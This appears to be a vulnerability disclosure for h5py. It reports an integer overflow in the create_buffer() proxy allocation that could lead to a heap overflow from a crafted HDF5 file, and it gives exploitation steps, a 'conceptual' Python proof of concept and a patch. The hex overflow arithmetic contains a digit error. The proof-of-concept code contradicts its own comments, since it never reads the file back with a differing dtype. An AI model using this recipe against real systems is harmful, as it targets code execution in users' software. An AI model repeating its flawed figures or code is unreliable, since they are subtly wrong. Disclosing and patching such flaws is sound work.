h5py-filter-plugin-rce-poc / h5py-02-create-buffer-integer-overflow.md
ryansecuritytest-fanpierlabs's picture
Upload h5py-02-create-buffer-integer-overflow.md with huggingface_hub
d4ed797 verified

Integer Overflow in Proxy Buffer Allocation Leading to Heap Buffer Overflow

Target

  • Project: h5py/h5py
  • URL: https://github.com/h5py/h5py
  • Component: _proxy.templ.pyx - create_buffer() function
  • CWE: CWE-190 (Integer Overflow or Wraparound), CWE-122 (Heap-based Buffer Overflow)

Severity: HIGH

Summary

The create_buffer() function in h5py/h5py/_proxy.templ.pyx computes the buffer size as size * npoints (where both are size_t) without checking for integer overflow. When a crafted HDF5 file specifies a dataset with a very large type size or number of points, the multiplication can wrap around, causing malloc() to allocate a much smaller buffer than expected. Subsequent H5Dread() or H5Tconvert() operations then write past the end of this undersized buffer, resulting in a heap buffer overflow.

Vulnerable Code

File: h5py/h5py/_proxy.templ.pyx (lines 294-308)

cdef void* create_buffer(size_t ipt_size, size_t opt_size, size_t nl) except NULL:

    cdef size_t final_size
    cdef void* buf

    if ipt_size >= opt_size:
        final_size = ipt_size*nl      # <-- INTEGER OVERFLOW: no bounds check
    else:
        final_size = opt_size*nl      # <-- INTEGER OVERFLOW: no bounds check

    buf = malloc(final_size)
    if buf == NULL:
        raise MemoryError("Failed to allocate conversion buffer")

    return buf

Callers (all in the same file):

Line 53 (attribute read/write proxy):

conv_buf = create_buffer(asize, msize, npoints)

Line 60:

back_buf = create_buffer(msize, asize, npoints)

Line 137 (dataset read/write proxy):

conv_buf = create_buffer(H5Tget_size(dstype), H5Tget_size(mtype), npoints)

Line 146:

back_buf = create_buffer(H5Tget_size(dstype), H5Tget_size(mtype), npoints)

Line 210 (vlen string read/write):

conv_buf = create_buffer(H5Tget_size(dstype), H5Tget_size(h5_vlen_string), npoints)

The overflow scenario:

The values ipt_size / opt_size come from H5Tget_size() which returns the size of the HDF5 datatype as stored in the file. The value nl (npoints) comes from H5Sget_select_npoints() which returns the number of selected elements in the dataspace. Both are controlled by the contents of the HDF5 file.

On a 64-bit system, if ipt_size = 0x100000001 (4GB+1, achievable with a compound type containing many members) and nl = 0x100000000 (4G points), then:

final_size = 0x100000001 * 0x100000000 = 0x100000000100000000

This overflows size_t (64-bit unsigned) to a small value, and malloc() returns a small buffer. The subsequent H5Dread() writes the full expected amount of data, overflowing the heap.

Even on 64-bit, more practical cases exist with compound types. For example, a compound type of size 65536 bytes with 281474976710656 (2^48) points overflows: 65536 * 281474976710656 = 2^64, wrapping to 0, which fails the NULL check... but values slightly above that wrap to small positive numbers.

On 32-bit systems this is trivially exploitable:

  • Type size: 65536 (compound type)
  • npoints: 65537
  • Product: 65536 * 65537 = 4,295,032,832 which wraps to 65536 on 32-bit size_t

Exploitation

  1. Craft an HDF5 file with:
    • A compound datatype with many fields to inflate H5Tget_size()
    • A dataspace with dimensions chosen so npoints times type_size overflows size_t
  2. Open the file with h5py and read the dataset
  3. The proxy code path is triggered when the dataset type requires conversion (compound types, vlen types, references)
  4. create_buffer() allocates a small buffer due to the overflow
  5. H5Dread() writes past the end of the buffer, corrupting the heap

Proof of Concept (conceptual):

import h5py
import numpy as np

# On a 32-bit system or with carefully chosen values on 64-bit:
# Create a file with a large compound type + many elements
# such that type_size * npoints overflows size_t

# The proxy buffer is used when compound type conversion is needed,
# so the file's compound type must differ from the memory type
# (e.g., different field ordering or extra fields)

with h5py.File('overflow.h5', 'w') as f:
    # Create compound dtype with large total size
    fields = [(f'field_{i}', 'f8') for i in range(8192)]  # 65536 bytes
    dt = np.dtype(fields)

    # On 32-bit: 65536 * 65537 wraps to 65536
    # Create dataset with 65537 elements
    f.create_dataset('data', shape=(65537,), dtype=dt)

# Reading back with a different compound dtype triggers proxy buffering
with h5py.File('overflow.h5', 'r') as f:
    # Read triggers create_buffer with overflowing size
    data = f['data'][:]  # Heap overflow occurs here

Impact

  • Heap buffer overflow: Can corrupt heap metadata, potentially leading to arbitrary code execution
  • Denial of Service: Crash via heap corruption or segfault
  • Triggered by simply reading a crafted HDF5 file with h5py
  • The compound type conversion proxy path is commonly used when reading HDF5 files created by different software versions or with different field orderings

Remediation

Add overflow checking to create_buffer():

cdef void* create_buffer(size_t ipt_size, size_t opt_size, size_t nl) except NULL:
    cdef size_t final_size
    cdef size_t elem_size
    cdef void* buf

    elem_size = ipt_size if ipt_size >= opt_size else opt_size

    # Check for overflow before multiplication
    if nl != 0 and elem_size > (<size_t>-1) / nl:
        raise OverflowError("Buffer size calculation would overflow")

    final_size = elem_size * nl

    buf = malloc(final_size)
    if buf == NULL:
        raise MemoryError("Failed to allocate conversion buffer")

    return buf

References